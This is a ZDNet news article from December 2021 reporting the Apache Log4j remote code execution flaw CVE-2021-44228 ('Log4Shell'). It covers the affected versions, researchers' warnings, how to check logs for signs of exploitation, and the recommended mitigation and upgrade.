Written by
Danny Palmer, Senior Reporter
Danny Palmer
Senior Reporter
Danny Palmer is a senior reporter at ZDNet. Based in London, he writes about issues including cybersecurity, hacking and malware threats.
Full Bio
on December 10, 2021
| Topic: Security
Why hackers are targeting web servers with malware and how to protect yours
Watch Now
A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers.
Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution as the user running the application utilises the Java logging library. CERT New Zealand warns that it’s already being exploited in the wild.
Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java.
SEE: A winning strategy for cybersecurity (ZDNet special report)
The vulnerability was first discovered in Minecraft but researchers warn that cloud applications are also vulnerable. It’s also used in enterprise applications and it’s likely that many products will be found to be vulnerable as more is learned about the flaw.
A blog post by researchers at LunaSec warns that anybody using Apache Struts is “likely vulnerable.”
LunaSec said: “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short.”
Organisations can identify if they’re affected by examining the log files for any services using affected Log4j versions. If they contain user-controlled strings, CERT-NZ uses the example of “Jndi:ldap”, they could be affected.
In order to mitigate vulnerabilities, users should switch log4j2.formatMsgNoLookups to true by adding:”‐Dlog4j2.formatMsgNoLookups=True” to the JVM command for starting the application.
To prevent the library being exploited, it’s urgently recommended that Log4j versions are upgraded to log4j-2.15.0-rc1.
“If you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,” cybersecurity researchers at Randori wrote in a blog post.
“If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly.”
MORE ON CYBERSECURITY
These researchers wanted to test cloud security. They were shocked by what they foundRansomware: Cyber criminals are still exploiting these old vulnerabilities, so patch nowA cloud company asked security researchers to look over its systems. Here’s what they foundGet patching: US, UK, and Australia issue joint advisory on top 30 exploited vulnerabilitiesCode execution bug patched in Imunify360 Linux server security suite
Security TV
|
Data Management
|
CXO
|
Data Centers